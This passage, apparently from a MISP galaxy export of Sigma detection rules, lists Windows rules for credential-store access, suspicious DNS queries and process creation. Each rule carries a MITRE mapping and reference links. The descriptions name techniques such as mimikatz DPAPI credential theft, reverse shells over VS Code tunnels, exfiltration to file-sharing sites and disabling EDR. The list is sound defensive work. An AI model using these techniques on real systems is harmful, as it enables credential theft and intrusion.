https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml

Access To Potentially Sensitive Sysvol Files By Uncommon Application

Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.

The tag is: misp-galaxy:sigma-rules="Access To Potentially Sensitive Sysvol Files By Uncommon Application"

Access To Potentially Sensitive Sysvol Files By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"

Table 10037. Table References

Links

https://github.com/vletoux/pingcastle

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_gpo_access_file.yml

Access To Browser Credential Files By Uncommon Application

Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing. Requires heavy baselining before usage

The tag is: misp-galaxy:sigma-rules="Access To Browser Credential Files By Uncommon Application"

Access To Browser Credential Files By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10038. Table References

Links

https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users

https://github.com/lclevy/firepwd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_access.yml

Access To Windows DPAPI Master Keys By Uncommon Application

Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function

The tag is: misp-galaxy:sigma-rules="Access To Windows DPAPI Master Keys By Uncommon Application"

Access To Windows DPAPI Master Keys By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 10039. Table References

Links

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords

http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml

Credential Manager Access By Uncommon Application

Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function

The tag is: misp-galaxy:sigma-rules="Credential Manager Access By Uncommon Application"

Credential Manager Access By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10040. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_access.yml

Access To Windows Credential History File By Uncommon Application

Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function

The tag is: misp-galaxy:sigma-rules="Access To Windows Credential History File By Uncommon Application"

Access To Windows Credential History File By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 10041. Table References

Links

https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist

https://www.passcape.com/windows_password_recovery_dpapi_credhist

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml

Access To .Reg/.Hive Files By Uncommon Application

Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups.

The tag is: misp-galaxy:sigma-rules="Access To .Reg/.Hive Files By Uncommon Application"

Access To .Reg/.Hive Files By Uncommon Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10042. Table References

Links

https://github.com/tccontre/Reg-Restore-Persistence-Mole

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_reg_and_hive_access.yml

Unusual File Modification by dns.exe

Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

The tag is: misp-galaxy:sigma-rules="Unusual File Modification by dns.exe"

Unusual File Modification by dns.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 10043. Table References

Links

https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_unusual_modification_by_dns_exe.yml

File Creation Date Changed to Another Year

Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.

The tag is: misp-galaxy:sigma-rules="File Creation Date Changed to Another Year"

File Creation Date Changed to Another Year has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 10044. Table References

Links

https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_change/file_change_win_2022_timestomping.yml

DNS Query To Remote Access Software Domain From Non-Browser App

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="DNS Query To Remote Access Software Domain From Non-Browser App"

DNS Query To Remote Access Software Domain From Non-Browser App has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10045. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows

https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml

DNS HybridConnectionManager Service Bus

Detects Azure Hybrid Connection Manager services querying the Azure service bus service

The tag is: misp-galaxy:sigma-rules="DNS HybridConnectionManager Service Bus"

DNS HybridConnectionManager Service Bus has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"

Table 10046. Table References

Links

https://twitter.com/Cyb3rWard0g/status/1381642789369286662

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml

Suspicious DNS Query for IP Lookup Service APIs

Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process.

The tag is: misp-galaxy:sigma-rules="Suspicious DNS Query for IP Lookup Service APIs"

Suspicious DNS Query for IP Lookup Service APIs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Gather Victim Network Information - T1590" with estimative-language:likelihood-probability="almost-certain"

Table 10047. Table References

Links

https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html

https://twitter.com/neonprimetime/status/1436376497980428318

https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_external_ip_lookup.yml

DNS Query To Visual Studio Code Tunnels Domain

Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

The tag is: misp-galaxy:sigma-rules="DNS Query To Visual Studio Code Tunnels Domain"

DNS Query To Visual Studio Code Tunnels Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10048. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://badoption.eu/blog/2023/01/31/code_c2.html

https://cydefops.com/vscode-data-exfiltration

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_vscode_tunnel_communication.yml

DNS Query for Anonfiles.com Domain - Sysmon

Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes

The tag is: misp-galaxy:sigma-rules="DNS Query for Anonfiles.com Domain - Sysmon"

DNS Query for Anonfiles.com Domain - Sysmon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 10049. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_anonymfiles_com.yml

DNS Server Discovery Via LDAP Query

Detects DNS server discovery via LDAP query requests from uncommon applications

The tag is: misp-galaxy:sigma-rules="DNS Server Discovery Via LDAP Query"

DNS Server Discovery Via LDAP Query has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 10050. Table References

Links

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04

https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml

TeamViewer Domain Query By Non-TeamViewer Application

Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn’t named TeamViewer (sometimes used by threat actors for obfuscation)

The tag is: misp-galaxy:sigma-rules="TeamViewer Domain Query By Non-TeamViewer Application"

TeamViewer Domain Query By Non-TeamViewer Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10051. Table References

Links

https://www.teamviewer.com/en-us/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_teamviewer_domain_query_by_uncommon_app.yml

DNS Query To MEGA Hosting Website

Detects DNS queries for subdomains related to MEGA sharing website

The tag is: misp-galaxy:sigma-rules="DNS Query To MEGA Hosting Website"

DNS Query To MEGA Hosting Website has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 10052. Table References

Links

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mega_nz.yml

DNS Query To Ufile.io

Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration

The tag is: misp-galaxy:sigma-rules="DNS Query To Ufile.io"

DNS Query To Ufile.io has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 10053. Table References

Links

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_ufile_io_query.yml

Suspicious Cobalt Strike DNS Beaconing - Sysmon

Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons

The tag is: misp-galaxy:sigma-rules="Suspicious Cobalt Strike DNS Beaconing - Sysmon"

Suspicious Cobalt Strike DNS Beaconing - Sysmon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 10054. Table References

Links

https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/

https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml

AppX Package Installation Attempts Via AppInstaller.EXE

Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL

The tag is: misp-galaxy:sigma-rules="AppX Package Installation Attempts Via AppInstaller.EXE"

AppX Package Installation Attempts Via AppInstaller.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10055. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/

https://twitter.com/notwhickey/status/1333900137232523264

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_appinstaller.yml

Detects DNS query requests to Cloudflared tunnels domains.

The tag is: misp-galaxy:sigma-rules="Cloudflared Tunnels Related DNS Requests"

Cloudflared Tunnels Related DNS Requests has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10056. Table References

Links

Internal Research[Internal Research]

https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_cloudflared_communication.yml

DNS Query Request By Regsvr32.EXE

Detects DNS queries initiated by "Regsvr32.exe"

The tag is: misp-galaxy:sigma-rules="DNS Query Request By Regsvr32.EXE"

DNS Query Request By Regsvr32.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10057. Table References

Links

https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_dns_query.yml

DNS Query Request To OneLaunch Update Service

Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.

The tag is: misp-galaxy:sigma-rules="DNS Query Request To OneLaunch Update Service"

DNS Query Request To OneLaunch Update Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 10058. Table References

Links

https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/

https://malware.guide/browser-hijacker/remove-onelaunch-virus/

https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_onelaunch_update_service.yml

DNS Query Tor .Onion Address - Sysmon

Detects DNS queries to an ".onion" address related to Tor routing networks

The tag is: misp-galaxy:sigma-rules="DNS Query Tor .Onion Address - Sysmon"

DNS Query Tor .Onion Address - Sysmon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

Table 10059. Table References

Links

https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_tor_onion_domain_query.yml

DNS Query To Devtunnels Domain

Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

The tag is: misp-galaxy:sigma-rules="DNS Query To Devtunnels Domain"

DNS Query To Devtunnels Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10060. Table References

Links

https://cydefops.com/devtunnels-unleashed

https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security

https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_devtunnels_communication.yml

New DLL Registered Via Odbcconf.EXE

Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.

The tag is: misp-galaxy:sigma-rules="New DLL Registered Via Odbcconf.EXE"

New DLL Registered Via Odbcconf.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008" with estimative-language:likelihood-probability="almost-certain"

Table 10061. Table References

Links

https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16

https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/

https://redcanary.com/blog/raspberry-robin/

https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml

Webshell Hacking Activity Patterns

Detects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system

The tag is: misp-galaxy:sigma-rules="Webshell Hacking Activity Patterns"

Webshell Hacking Activity Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 10062. Table References

Links

https://youtu.be/7aemGhaE9ds?t=641

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml

PowerShell Execution With Potential Decryption Capabilities

Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.

The tag is: misp-galaxy:sigma-rules="PowerShell Execution With Potential Decryption Capabilities"

Table 10063. Table References

Links

https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml

New Generic Credentials Added Via Cmdkey.EXE

Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface.

The tag is: misp-galaxy:sigma-rules="New Generic Credentials Added Via Cmdkey.EXE"

New Generic Credentials Added Via Cmdkey.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

Table 10064. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml

Add SafeBoot Keys Via Reg Utility

Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not

The tag is: misp-galaxy:sigma-rules="Add SafeBoot Keys Via Reg Utility"

Add SafeBoot Keys Via Reg Utility has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10065. Table References

Links

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml

Suspicious DLL Loaded via CertOC.EXE

Detects when a user installs certificates by using CertOC.exe to load the target DLL file.

The tag is: misp-galaxy:sigma-rules="Suspicious DLL Loaded via CertOC.EXE"

Suspicious DLL Loaded via CertOC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10066. Table References

Links

https://twitter.com/sblmsrsn/status/1445758411803480072?s=20

https://lolbas-project.github.io/lolbas/Binaries/Certoc/

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml

Suspicious Service DACL Modification Via Set-Service Cmdlet

Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable

The tag is: misp-galaxy:sigma-rules="Suspicious Service DACL Modification Via Set-Service Cmdlet"

Suspicious Service DACL Modification Via Set-Service Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10067. Table References

Links

https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings

https://www.sans.org/blog/red-team-tactics-hiding-windows-services/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml

Remote Access Tool - ScreenConnect Installation Execution

Detects ScreenConnect program starts that establish a remote access to a system.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Installation Execution"

Remote Access Tool - ScreenConnect Installation Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

Table 10068. Table References

Links

https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_installation_cli_param.yml

CobaltStrike Load by Rundll32

Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.

The tag is: misp-galaxy:sigma-rules="CobaltStrike Load by Rundll32"

CobaltStrike Load by Rundll32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10069. Table References

Links

https://redcanary.com/threat-detection-report/

https://www.cobaltstrike.com/help-windows-executable

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml

Sysinternals PsSuspend Suspicious Execution

Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses

The tag is: misp-galaxy:sigma-rules="Sysinternals PsSuspend Suspicious Execution"

Sysinternals PsSuspend Suspicious Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10070. Table References

Links

https://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend

https://twitter.com/0gtweet/status/1638069413717975046

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml

Potential Obfuscated Ordinal Call Via Rundll32

Detects execution of "rundll32" with potential obfuscated ordinal calls

The tag is: misp-galaxy:sigma-rules="Potential Obfuscated Ordinal Call Via Rundll32"

Table 10072. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml

Renamed AdFind Execution

Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.

The tag is: misp-galaxy:sigma-rules="Renamed AdFind Execution"

Renamed AdFind Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

Table 10073. Table References

Links

https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx

https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/

https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md

https://thedfirreport.com/2020/05/08/adfind-recon/

https://www.joeware.net/freetools/tools/adfind/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_adfind.yml

WhoAmI as Parameter

Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)

The tag is: misp-galaxy:sigma-rules="WhoAmI as Parameter"

WhoAmI as Parameter has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10074. Table References

Links

https://twitter.com/blackarrowsec/status/1463805700602224645?s=12

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml

Unusual Parent Process For Cmd.EXE

Detects suspicious parent process for cmd.exe

The tag is: misp-galaxy:sigma-rules="Unusual Parent Process For Cmd.EXE"

Unusual Parent Process For Cmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10075. Table References

Links

https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_unusual_parent.yml

Potential Meterpreter/CobaltStrike Activity

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting

The tag is: misp-galaxy:sigma-rules="Potential Meterpreter/CobaltStrike Activity"

Potential Meterpreter/CobaltStrike Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

Table 10076. Table References

Links

https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/

https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml

Remote Access Tool - Anydesk Execution From Suspicious Folder

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - Anydesk Execution From Suspicious Folder"

Remote Access Tool - Anydesk Execution From Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10077. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml

Disabled Volume Snapshots

Detects commands that temporarily turn off Volume Snapshots

The tag is: misp-galaxy:sigma-rules="Disabled Volume Snapshots"

Disabled Volume Snapshots has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10078. Table References

Links

https://twitter.com/0gtweet/status/1354766164166115331

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_volsnap_disable.yml

Microsoft IIS Connection Strings Decryption

Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.

The tag is: misp-galaxy:sigma-rules="Microsoft IIS Connection Strings Decryption"

Microsoft IIS Connection Strings Decryption has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10079. Table References

Links

https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml

Dumping Process via Sqldumper.exe

Detects process dump via legitimate sqldumper.exe binary

The tag is: misp-galaxy:sigma-rules="Dumping Process via Sqldumper.exe"

